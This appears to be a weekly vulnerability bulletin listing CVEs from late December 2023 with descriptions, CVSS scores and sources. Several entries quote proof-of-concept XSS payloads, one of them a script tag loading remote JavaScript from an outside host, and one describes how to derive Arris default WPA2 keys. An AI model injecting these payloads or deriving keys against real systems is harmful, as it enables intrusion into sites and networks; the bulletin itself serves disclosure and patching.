wordpress — wordpress A vulnerability was found in BestWebSoft Portfolio Plugin up to 2.04 on WordPress. It has been classified as problematic. This affects an unknown part. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. Upgrading to version 2.06 is able to address this issue. The patch is named 68af950330c3202a706f0ae9bbb52ceaa17dda9d. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248955. 2023-12-26 4.3 CVE-2012-10017
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in CRM Perks Integration for HubSpot and Contact Form 7, WPForms, Elementor, Ninja Forms. This issue affects Integration for HubSpot and Contact Form 7, WPForms, Elementor, Ninja Forms: from n/a through 1.2.8. 2023-12-29 4.7 CVE-2023-31095
audit@patchstack.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in WP Directory Kit. This issue affects WP Directory Kit: from n/a through 1.1.9. 2023-12-29 4.7 CVE-2023-31229
audit@patchstack.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in Dylan James Zephyr Project Manager. This issue affects Zephyr Project Manager: from n/a through 3.3.9. 2023-12-29 4.7 CVE-2023-31237
audit@patchstack.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in Pexle Chris Library Viewer. This issue affects Library Viewer: from n/a through 2.0.6. 2023-12-29 4.7 CVE-2023-32101
audit@patchstack.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in PluginOps MailChimp Subscribe Form, Optin Builder, PopUp Builder, Form Builder. This issue affects MailChimp Subscribe Form, Optin Builder, PopUp Builder, Form Builder: from n/a through 4.0.9.3. 2023-12-29 4.7 CVE-2023-32517
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Marios Alexandrou Add Any Extension to Pages. This issue affects Add Any Extension to Pages: from n/a through 1.4. 2023-12-28 4.3 CVE-2023-50873
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in WPExpertsio New User Approve. This issue affects New User Approve: from n/a through 2.5.1. 2023-12-29 4.3 CVE-2023-50902
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in WebbaPlugins Appointment & Event Booking Calendar Plugin – Webba Booking. This issue affects Appointment & Event Booking Calendar Plugin – Webba Booking: from n/a through 4.5.33. 2023-12-29 4.3 CVE-2023-51354
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Brain Storm Force Ultimate Addons for WPBakery Page Builder. This issue affects Ultimate Addons for WPBakery Page Builder: from n/a through 3.19.17. 2023-12-29 4.3 CVE-2023-51402
audit@patchstack.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in CodePeople Calculated Fields Form. This issue affects Calculated Fields Form: from n/a through 1.2.28. 2023-12-29 4.1 CVE-2023-51517
audit@patchstack.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in AAM Advanced Access Manager – Restricted Content, Users & Roles, Enhanced Security and More. This issue affects Advanced Access Manager – Restricted Content, Users & Roles, Enhanced Security and More: from n/a through 6.9.18. 2023-12-29 4.7 CVE-2023-51675
audit@patchstack.com
wordpress — wordpress Server-Side Request Forgery (SSRF) vulnerability in Leevio Happy Addons for Elementor. This issue affects Happy Addons for Elementor: from n/a through 3.9.1.1. 2023-12-29 4.9 CVE-2023-51676
audit@patchstack.com
y_project — ruoyi A vulnerability was found in y_project RuoYi 4.7.8. It has been declared as problematic. This vulnerability affects unknown code of the file /login of the component HTTP POST Request Handler. The manipulation of the argument rememberMe with the input falsen3f0m<script>alert(1)</script>p86o0 leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249136. 2023-12-28 4.3 CVE-2023-7133
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
yiisoft — yii2-authclient yii2-authclient is an extension that adds OpenID, OAuth, OAuth2 and OpenId Connect consumers for the Yii framework 2.0. In yii2-authclient prior to version 2.2.15, the Oauth1/2 `state` and OpenID Connect `nonce` is vulnerable for a `timing attack` since it is compared via regular string comparison (instead of `Yii::$app->getSecurity()->compareString()`). Version 2.2.15 contains a patch for the issue. No known workarounds are available. 2023-12-22 6.1 CVE-2023-50708
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
yiisoft — yii2-authclient yii2-authclient is an extension that adds OpenID, OAuth, OAuth2 and OpenId Connect consumers for the Yii framework 2.0. In yii2-authclient prior to version 2.2.15, the Oauth2 PKCE implementation is vulnerable in 2 ways. First, the `authCodeVerifier` should be removed after usage (similar to `authState`). Second, there is a risk for a `downgrade attack` if PKCE is being relied on for CSRF protection. Version 2.2.15 contains a patch for the issue. No known workarounds are available. 2023-12-22 6.8 CVE-2023-50714
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
ìzmir_katip_çelebi_university — university_information_management_system Improper Input Validation vulnerability in İzmir Katip Çelebi University University Information Management System allows Absolute Path Traversal. This issue affects University Information Management System: before 30.11.2023. 2023-12-27 6.5 CVE-2023-6190
iletisim@usom.gov.tr

Back to top

 

Low Vulnerabilities

Primary
Vendor — Product		 Description Published CVSS Score Source & Patch Info
bestwebsoft — portfolio_plugin A vulnerability was found in BestWebSoft Portfolio Plugin up to 2.27. It has been declared as problematic. This vulnerability affects the function bws_add_menu_render of the file bws_menu/bws_menu.php. The manipulation of the argument bwsmn_form_email leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 2.28 is able to address this issue. The name of the patch is d2ede580474665af56ff262a05783fbabe4529b8. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248956. 2023-12-26 3.5 CVE-2014-125109
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
code-projects — client_details_system A vulnerability was found in code-projects Client Details System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /admin/regester.php. The manipulation of the argument fname/lname/email/contact leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249146 is the identifier assigned to this vulnerability. 2023-12-29 2.4 CVE-2023-7143
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
code-projects — intern_membership_management_system A vulnerability was found in code-projects Intern Membership Management System 2.0. It has been classified as problematic. This affects an unknown part of the file /user_registration/ of the component User Registration. The manipulation of the argument userName/firstName/lastName/userEmail with the input “><ScRiPt>confirm(document.domain)</ScRiPt>h0la leads to cross site scripting. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249135. 2023-12-28 3.5 CVE-2023-7132
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
code-projects — qr_code_generator A vulnerability was found in code-projects QR Code Generator 1.0. It has been classified as problematic. This affects an unknown part of the file /download.php?file=author.png. The manipulation of the argument file with the input “><iMg src=N onerror=alert(document.domain)> leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249153 was assigned to this vulnerability. 2023-12-29 3.5 CVE-2023-7149
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
code-projects — record_management_system A vulnerability classified as problematic has been found in code-projects Record Management System 1.0. Affected is an unknown function of the file /main/offices.php of the component Offices Handler. The manipulation of the argument officename with the input “><script src=”https://js.rip/b23tmbxf49”></script> leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249138 is the identifier assigned to this vulnerability. 2023-12-28 2.4 CVE-2023-7135
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
code-projects — record_management_system A vulnerability classified as problematic was found in code-projects Record Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /main/doctype.php of the component Document Type Handler. The manipulation of the argument docname with the input “><script src=”https://js.rip/b23tmbxf49”></script> leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249139. 2023-12-28 2.4 CVE-2023-7136
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
honor — com.hihonor.magichome Some Honor products are affected by incorrect privilege assignment vulnerability, successful exploitation could cause device service exceptions. 2023-12-29 3.3 CVE-2023-23430
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — com.hihonor.vmall Some Honor products are affected by information leak vulnerability, successful exploitation could cause the information leak 2023-12-29 3.3 CVE-2023-23437
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — lge-an00 Some Honor products are affected by information leak vulnerability, successful exploitation could cause the information leak. 2023-12-29 3.3 CVE-2023-23440
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — magic_os Some Honor products are affected by incorrect privilege assignment vulnerability, successful exploitation could cause device service exceptions. 2023-12-29 3.3 CVE-2023-23428
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — magic_ui Some Honor products are affected by out of bounds read vulnerability, successful exploitation could cause information leak. 2023-12-29 3.2 CVE-2023-51432
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — magic_ui Some Honor products are affected by incorrect privilege assignment vulnerability, successful exploitation could cause information leak. 2023-12-29 2.9 CVE-2023-51433
3836d913-7555-4dd0-a509-f5667fdf5fe4
mattermost — mattermost Mattermost version 8.1.6 and earlier fails to sanitize channel mention data in posts, which allows an attacker to inject markup in the web client. 2023-12-29 3.7 CVE-2023-7113
responsibledisclosure@mattermost.com
myaac — myaac A vulnerability was found in slawkens MyAAC up to 0.8.13. It has been declared as problematic. This vulnerability affects unknown code of the file system/pages/bugtracker.php. The manipulation of the argument bug[2][‘subject’]/bug[2][‘text’]/report[‘subject’] leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 0.8.14 is able to address this issue. The name of the patch is 83a91ec540072d319dd338abff45f8d5ebf48190. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248848. 2023-12-22 3.5 CVE-2023-7076
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
nautobot — nautobot Nautobot is a Network Source of Truth and Network Automation Platform built as a web application atop the Django Python framework with a PostgreSQL or MySQL database. When submitting a Job to run via a Job Button, only the model-level `extras.run_job` permission is checked (i.e., does the user have permission to run Jobs in general). Object-level permissions (i.e., does the user have permission to run this specific Job?) are not enforced by the URL/view used in this case. A user with permissions to run even a single Job can actually run all configured JobButton Jobs. Fix will be available in Nautobot 1.6.8 and 2.1.0 2023-12-22 3.5 CVE-2023-51649
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
nextcloud — nextcloud/cloud Nextcloud/Cloud is a calendar app for Nextcloud. An attacker can gain access to stacktrace and internal paths of the server when generating an exception while editing a calendar appointment. It is recommended that the Nextcloud Calendar app is upgraded to 4.5.3 2023-12-22 3.5 CVE-2023-48308
security-advisories@github.com
security-advisories@github.com
novel-plus — novel-plus A vulnerability classified as problematic has been found in Novel-Plus up to 4.2.0. This affects an unknown part of the file /user/updateUserInfo of the component HTTP POST Request Handler. The manipulation of the argument nickName leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of the patch is c62da9bb3a9b3603014d0edb436146512631100d. It is recommended to apply a patch to fix this issue. The identifier VDB-249201 was assigned to this vulnerability. 2023-12-29 3.5 CVE-2023-7166
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
novel-plus — novel-plus A vulnerability was found in Novel-Plus up to 4.2.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file novel-admin/src/main/java/com/java2nb/novel/controller/FriendLinkController.java of the component Friendly Link Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The patch is named d6093d8182362422370d7eaf6c53afde9ee45215. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-249307. 2023-12-29 2.4 CVE-2023-7171
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
pandora_fms — pandora_fms Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Pandora FMS on all allows Cross-Site Scripting (XSS). Allows you to edit the Web Console user notification options. This issue affects Pandora FMS: from 700 through 774. 2023-12-29 3 CVE-2023-41813
security@pandorafms.com
pandora_fms — pandora_fms Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Pandora FMS on all allows Cross-Site Scripting (XSS). Through an HTML payload (iframe tag) it is possible to carry out XSS attacks when the user receiving the messages opens their notifications. This issue affects Pandora FMS: from 700 through 774. 2023-12-29 3.7 CVE-2023-41814
security@pandorafms.com
poly — multiple_products A vulnerability classified as problematic has been found in Poly CCX 400, CCX 600, Trio 8800 and Trio C60. This affects an unknown part of the component Web Configuration Application. The manipulation leads to insufficiently random values. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249255. 2023-12-29 3.7 CVE-2023-4462
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
poly — multiple_products A vulnerability, which was classified as problematic, was found in Poly CCX 400, CCX 600, Trio 8800 and Trio C60. Affected is an unknown function of the component Configuration File Import. The manipulation of the argument device.auth.localAdminPassword leads to unverified password change. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249258 is the identifier assigned to this vulnerability. 2023-12-29 2.7 CVE-2023-4465
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
poly — multiple_products A vulnerability has been found in Poly CCX 400, CCX 600, Trio 8800 and Trio C60 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Web Interface. The manipulation leads to protection mechanism failure. The attack can be launched remotely. The vendor explains that they do not regard this as a vulnerability as this is a feature that they offer to their customers who have a variety of environmental needs that are met through different firmware builds. To avoid potential roll-back attacks, they remove vulnerable builds from the public servers as a remediation effort. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249259. 2023-12-29 2.7 CVE-2023-4466
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
sourcecodester — engineers_online_portal A vulnerability was found in SourceCodester Engineers Online Portal 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the component Add Engineer Handler. The manipulation of the argument first name/last name with the input <script>alert(0)</script> leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249182 is the identifier assigned to this vulnerability. 2023-12-29 2.4 CVE-2023-7160
cna@vuldb.com
cna@vuldb.com
w3c — online-spellchecker-py A vulnerability was found in w3c online-spellchecker-py up to 20140130. It has been rated as problematic. This issue affects some unknown processing of the file spellchecker. The manipulation leads to cross site scripting. The attack may be initiated remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The identifier of the patch is d6c21fd8187c5db2a50425ff80694149e75d722e. It is recommended to apply a patch to fix this issue. The identifier VDB-248849 was assigned to this vulnerability. 2023-12-23 3.1 CVE-2014-125108
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
winter_cms — winter_cms Winter is a free, open-source content management system. Users with access to backend forms that include a ColorPicker FormWidget can provide a value that would then be included without further processing in the compilation of custom stylesheets via LESS. This had the potential to lead to a Local File Inclusion vulnerability. This issue has been patched in v1.2.4. 2023-12-29 3.3 CVE-2023-52085
security-advisories@github.com
security-advisories@github.com
winter_cms — winter_cms Winter is a free, open-source content management system. Prior to 1.2.4, users with the `media.manage_media` permission can upload files to the Media Manager and rename them after uploading. Previously, media manager files were only sanitized on upload, not on renaming, which could have allowed a stored XSS attack. This issue has been patched in v1.2.4. 2023-12-28 2 CVE-2023-52083
security-advisories@github.com
security-advisories@github.com
winter_cms — winter_cms
 		 Winter is a free, open-source content management system. Prior to 1.2.4, Users with access to backend forms that include a ColorPicker FormWidget can provide a value that would then be rendered unescaped in the backend form, potentially allowing for a stored XSS attack. This issue has been patched in v1.2.4. 2023-12-28 2 CVE-2023-52084
security-advisories@github.com
security-advisories@github.com
wordpress — wordpress A vulnerability was found in PlusCaptcha Plugin up to 2.0.6 on WordPress and classified as problematic. Affected by this issue is some unknown functionality. The manipulation leads to cross site scripting. The attack may be launched remotely. Upgrading to version 2.0.14 is able to address this issue. The patch is identified as 1274afc635170daafd38306487b6bb8a01f78ecd. It is recommended to upgrade the affected component. VDB-248954 is the identifier assigned to this vulnerability. 2023-12-26 3.5 CVE-2015-10127
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
wordpress — wordpress Missing Authorization vulnerability in Anders Thorborg. This issue affects Anders Thorborg: from n/a through 1.4.12. 2023-12-29 3.1 CVE-2023-22676
audit@patchstack.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in SolidWP Solid Security – Password, Two Factor Authentication, and Brute Force Protection. This issue affects Solid Security – Password, Two Factor Authentication, and Brute Force Protection: from n/a through 8.1.4. 2023-12-29 3.7 CVE-2023-28786
audit@patchstack.com

Back to top

 

Severity Not Yet Assigned

Primary
Vendor — Product		 Description Published CVSS Score Source & Patch Info
3cx — 3cx The CRM Integration in 3CX before 18.0.9.23 and 20 before 20.0.0.1494 allows SQL Injection via a first name, search string, or email address. 2023-12-25 not yet calculated CVE-2023-49954
cve@mitre.org
alfasado_inc. — powercms PowerCMS (6 Series, 5 Series, and 4 Series) contains a stored cross-site scripting vulnerability. If this vulnerability is exploited, an arbitrary script may be executed on a logged-in user’s web browser. Note that all versions of PowerCMS 3 Series and earlier which are unsupported (End-of-Life, EOL) are also affected by this vulnerability. 2023-12-26 not yet calculated CVE-2023-49117
vultures@jpcert.or.jp
vultures@jpcert.or.jp
alfasado_inc. — powercms Open redirect vulnerability in PowerCMS (6 Series, 5 Series, and 4 Series) allows a remote unauthenticated attacker to redirect users to arbitrary web sites via a specially crafted URL. Note that all versions of PowerCMS 3 Series and earlier which are unsupported (End-of-Life, EOL) are also affected by this vulnerability. 2023-12-26 not yet calculated CVE-2023-50297
vultures@jpcert.or.jp
vultures@jpcert.or.jp
apache — dolphinscheduler Improper Input Validation vulnerability in Apache DolphinScheduler. An authenticated user can cause arbitrary, unsandboxed javascript to be executed on the server. This issue affects Apache DolphinScheduler: until 3.1.9. Users are recommended to upgrade to version 3.1.9, which fixes the issue. 2023-12-30 not yet calculated CVE-2023-49299
security@apache.org
security@apache.org
apache — ofbiz Arbitrary file properties reading vulnerability in Apache Software Foundation Apache OFBiz when user operates an uri call without authorizations. The same uri can be operated to realize a SSRF attack also without authorizations. Users are recommended to upgrade to version 18.12.11, which fixes this issue. 2023-12-26 not yet calculated CVE-2023-50968
security@apache.org
security@apache.org
security@apache.org
security@apache.org
security@apache.org
security@apache.org
apache — ofbiz The vulnerability allows attackers to bypass authentication to achieve a simple Server-Side Request Forgery (SSRF) 2023-12-26 not yet calculated CVE-2023-51467
security@apache.org
security@apache.org
security@apache.org
security@apache.org
security@apache.org
security@apache.org
security@apache.org
apache — openoffice Apache OpenOffice documents can contain links that call internal macros with arbitrary arguments. Several URI Schemes are defined for this purpose. Links can be activated by clicks, or by automatic document events. The execution of such links must be subject to user approval. In the affected versions of OpenOffice, approval for certain links is not requested; when activated, such links could therefore result in arbitrary script execution. This is a corner case of CVE-2022-47502. 2023-12-29 not yet calculated CVE-2023-47804
security@apache.org
security@apache.org
array — arrayos_ag MotionPro in Array ArrayOS AG before 9.4.0.505 on AG and vxAG allows remote command execution via crafted packets. AG and vxAG 9.3.0.259.x are unaffected. 2023-12-22 not yet calculated CVE-2023-51707
cve@mitre.org
arris_solutions,_inc. — dg860a/dg1670a
 		 Arris DG860A and DG1670A devices have predictable default WPA2 PSKs that could lead to unauthorized remote access. (They use the first 6 characters of the SSID and the last 6 characters of the BSSID, decrementing the last digit.) 2023-12-27 not yet calculated CVE-2023-40038
cve@mitre.org
cve@mitre.org
artistscope — artisbrowser An issue in ArtistScope ArtisBrowser v.34.1.5 and before allows an attacker to bypass intended access restrictions via interaction with the com.artis.browser.IntentReceiverActivity component. 2023-12-27 not yet calculated CVE-2023-49000
cve@mitre.org
cve@mitre.org
asp.net_zero — asp.net_zero An open redirect through HTML injection in user messages in Asp.Net Zero before 12.3.0 allows remote attackers to redirect targeted victims to any URL via the ‘<meta http-equiv=”refresh”‘ in the WebSocket messages. 2023-12-26 not yet calculated CVE-2023-48003
cve@mitre.org
cve@mitre.org
barracuda_networks_inc. — barracuda_esg_appliance Use of a Third Party library produced a vulnerability in Barracuda Networks Inc. Barracuda ESG Appliance which allowed Parameter Injection. This issue affected Barracuda ESG Appliance, from 5.1.3.001 through 9.2.1.001, until Barracuda removed the vulnerable logic. 2023-12-24 not yet calculated CVE-2023-7102
mandiant-cve@google.com
mandiant-cve@google.com
mandiant-cve@google.com
mandiant-cve@google.com
mandiant-cve@google.com
mandiant-cve@google.com
bees_blog — bees_blog The beesblog (aka Bees Blog) component before 1.6.2 for thirty bees allows Reflected XSS because controllers/front/post.php sharing_url is mishandled. 2023-12-30 not yet calculated CVE-2023-52264
cve@mitre.org
cve@mitre.org
cve@mitre.org
bentley_systems — assetwise_integrity_information_server Bentley eB System Management Console applications within Assetwise Integrity Information Server allow an unauthenticated user to view configuration options via a crafted request, leading to information disclosure. This affects eB System management Console before 23.00.02.03 and Assetwise ALIM For Transportation before 23.00.01.25. 2023-12-22 not yet calculated CVE-2023-51708
cve@mitre.org
beyondtrust_corporation — privilege_management_for_windows The Challenge Response feature of BeyondTrust Privilege Management for Windows (PMfW) before 2023-07-14 allows local administrators to bypass this feature by decrypting the shared key, or by locating the decrypted shared key in process memory. The threat is mitigated by the Agent Protection feature. 2023-12-25 not yet calculated CVE-2023-49944
cve@mitre.org
cve@mitre.org
brave_browser — brave_browser Brave Browser before 1.59.40 does not properly restrict the schema for WebUI factory and redirect. This is related to browser/brave_content_browser_client.cc and browser/ui/webui/brave_web_ui_controller_factory.cc. 2023-12-30 not yet calculated CVE-2023-52263
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
brother_industries,_ltd. — iprint&scan_desktop_for_windows Improper link resolution before file access (‘Link Following’) issue exists in iPrint&Scan Desktop for Windows versions 11.0.0 and earlier. A symlink attack by a malicious user may cause a Denial-of-service (DoS) condition on the PC. 2023-12-26 not yet calculated CVE-2023-51654
vultures@jpcert.or.jp
buffalo_inc. — vr-s1000 VR-S1000 firmware Ver. 2.37 and earlier allows an attacker with access to the product’s web management page to execute arbitrary OS commands. 2023-12-26 not yet calculated CVE-2023-45741
vultures@jpcert.or.jp
vultures@jpcert.or.jp
buffalo_inc. — vr-s1000 Improper neutralization of argument delimiters in a command (‘Argument Injection’) vulnerability in VR-S1000 firmware Ver. 2.37 and earlier allows an authenticated attacker who can access to the product’s command line interface to execute an arbitrary command. 2023-12-26 not yet calculated CVE-2023-46681
vultures@jpcert.or.jp
vultures@jpcert.or.jp
buffalo_inc. — vr-s1000 VR-S1000 firmware Ver. 2.37 and earlier uses a hard-coded cryptographic key which may allow an attacker to analyze the password of a specific product user. 2023-12-26 not yet calculated CVE-2023-46711
vultures@jpcert.or.jp
vultures@jpcert.or.jp
buffalo_inc. — vr-s1000 VR-S1000 firmware Ver. 2.37 and earlier allows a network-adjacent unauthenticated attacker who can access the product’s web management page to obtain sensitive information. 2023-12-26 not yet calculated CVE-2023-51363
vultures@jpcert.or.jp
vultures@jpcert.or.jp
buildkite — elastic_ci_for_aws A symbolic link following vulnerability in Buildkite Elastic CI for AWS versions prior to 6.7.1 and 5.22.5 allows the buildkite-agent user to change ownership of arbitrary directories via the PIPELINE_PATH variable in the fix-buildkite-agent-builds-permissions script. 2023-12-22 not yet calculated CVE-2023-43116
cve@mitre.org
buildkite — elastic_ci_for_aws A time-of-check-time-of-use race condition vulnerability in Buildkite Elastic CI for AWS versions prior to 6.7.1 and 5.22.5 allows the buildkite-agent user to bypass a symbolic link check for the PIPELINE_PATH variable in the fix-buildkite-agent-builds-permissions script. 2023-12-22 not yet calculated CVE-2023-43741
cve@mitre.org
com.sdjictec.qdmetro — com.sdjictec.qdmetro An issue in the export component AdSdkH5Activity of com.sdjictec.qdmetro v4.2.2 allows attackers to open a crafted URL without any filtering or checking. 2023-12-28 not yet calculated CVE-2023-51010
cve@mitre.org
documize_inc. — documize SQL Injection vulnerability in Documize version 5.4.2, allows remote attackers to execute arbitrary code via the user parameter of the /api/dashboard/activity endpoint. 2023-12-29 not yet calculated CVE-2023-23634
cve@mitre.org
easy-rules-mvel — easy-rules-mvel easy-rules-mvel v4.1.0 was discovered to contain a remote code execution (RCE) vulnerability via the component MVELRule. 2023-12-29 not yet calculated CVE-2023-50571
cve@mitre.org
exim — exim Exim before 4.97.1 allows SMTP smuggling in certain PIPELINING/CHUNKING configurations. Remote attackers can use a published exploitation technique to inject e-mail messages with a spoofed MAIL FROM address, allowing bypass of an SPF protection mechanism. This occurs because Exim supports <LF>.<CR><LF> but some other popular e-mail servers do not. 2023-12-24 not yet calculated CVE-2023-51766
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
filerun — filerun FileRun 20220519 allows SQL Injection via the “dir” parameter in a /?module=users&section=cpanel&page=list request. 2023-12-22 not yet calculated CVE-2022-47532
cve@mitre.org
flask-security-too — flask-security-too An open redirect vulnerability in the python package Flask-Security-Too <=5.3.2 allows attackers to redirect unsuspecting users to malicious sites via a crafted URL by abusing the ?next parameter on the /login and /register routes. 2023-12-26 not yet calculated CVE-2023-49438
cve@mitre.org
cve@mitre.org
follet_learning_solutions — destiny_suite
 		 A Cross Site Scripting (XSS) vulnerability exists in Follet Learning Solutions Destiny through 20.0_1U. via the handlewpesearchform.do. searchString. 2023-12-25 not yet calculated CVE-2023-38826
cve@mitre.org
cve@mitre.org
fortanix — enclaveos_confidential_computing_manager An issue was discovered in Fortanix EnclaveOS Confidential Computing Manager (CCM) Platform before 3.32 for Intel SGX. Lack of pointer-alignment validation logic in entry functions allows a local attacker to access unauthorized information. This relates to the enclave_ecall function and system call layer. 2023-12-30 not yet calculated CVE-2023-38021
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
fortanix — enclaveos_confidential_computing_manager An issue was discovered in Fortanix EnclaveOS Confidential Computing Manager (CCM) Platform before 3.29 for Intel SGX. Insufficient pointer validation allows a local attacker to access unauthorized information. This relates to strlen and sgx_is_within_user. 2023-12-30 not yet calculated CVE-2023-38022
cve@mitre.org
cve@mitre.org
free5gc — free5gc An issue was discovered in free5GC version 3.3.0, allows remote attackers to execute arbitrary code and cause a denial of service (DoS) on AMF component via crafted NGAP message. 2023-12-22 not yet calculated CVE-2023-49391
cve@mitre.org
gl.inet — multiple_products Shell Injection vulnerability GL.iNet A1300 v4.4.6, AX1800 v4.4.6, AXT1800 v4.4.6, MT3000 v4.4.6, MT2500 v4.4.6, MT6000 v4.5.0, MT1300 v4.3.7, MT300N-V2 v4.3.7, AR750S v4.3.7, AR750 v4.3.7, AR300M v4.3.7, and B1300 v4.3.7., allows local attackers to execute arbitrary code via the get_system_log and get_crash_log functions of the logread module, as well as the upgrade_online function of the upgrade module. 2023-12-28 not yet calculated CVE-2023-50445
cve@mitre.org
grupo_embras — geosiap_erp Grupo Embras GEOSIAP ERP v2.2.167.02 was discovered to contain a SQL injection vulnerability via the codLogin parameter on the login page. 2023-12-30 not yet calculated CVE-2023-50589
cve@mitre.org
cve@mitre.org
cve@mitre.org
hutool-core — hutool-core hutool-core v5.8.23 was discovered to contain an infinite loop in the StrSplitter.splitByRegex function. This vulnerability allows attackers to cause a Denial of Service (DoS) via manipulation of the first two parameters. 2023-12-27 not yet calculated CVE-2023-51075
cve@mitre.org
hutool-core — hutool-core The NumberUtil.toBigDecimal method in hutool-core v5.8.23 was discovered to contain a stack overflow. 2023-12-27 not yet calculated CVE-2023-51080
cve@mitre.org
hyavijava — hyavijava hyavijava v6.0.07.1 was discovered to contain a stack overflow via the ResultConverter.convert2Xml method. 2023-12-27 not yet calculated CVE-2023-51084
cve@mitre.org
idurar-erp-crm — idurar-erp-crm IDURAR (aka idurar-erp-crm) through 2.0.1 allows stored XSS via a PATCH request with a crafted JSON email template in the /api/email/update data. 2023-12-30 not yet calculated CVE-2023-52265
cve@mitre.org
cve@mitre.org
ilias_e-learning — ilias_e-learning The workflow-engine of ILIAS before 7.23 and 8 before 8.3 allows remote authenticated users to run arbitrary system commands on the application server as the application user via a malicious BPMN2 workflow definition file. 2023-12-25 not yet calculated CVE-2023-36485
cve@mitre.org
cve@mitre.org
cve@mitre.org
ilias_e-learning — ilias_e-learning The workflow-engine of ILIAS before 7.23 and 8 before 8.3 allows remote authenticated users to run arbitrary system commands on the application server as the application user by uploading a workflow definition file with a malicious filename. 2023-12-25 not yet calculated CVE-2023-36486
cve@mitre.org
cve@mitre.org
cve@mitre.org
indi_browser/kvbrowser — indi_browser/kvbrowser An issue in Indi Browser (aka kvbrowser) v.12.11.23 allows an attacker to bypass intended access restrictions via interaction with the com.example.gurry.kvbrowswer.webview component. 2023-12-27 not yet calculated CVE-2023-49001
cve@mitre.org
cve@mitre.org
ipaddressbitsdivision — ipaddressbitsdivision An issue in the component IPAddressBitsDivision of IPAddress v5.1.0 leads to an infinite loop. 2023-12-29 not yet calculated CVE-2023-50570
cve@mitre.org
jamf_pro_server — jamf_pro_server There is broken access control during authentication in Jamf Pro Server before 10.46.1. 2023-12-25 not yet calculated CVE-2023-31224
cve@mitre.org
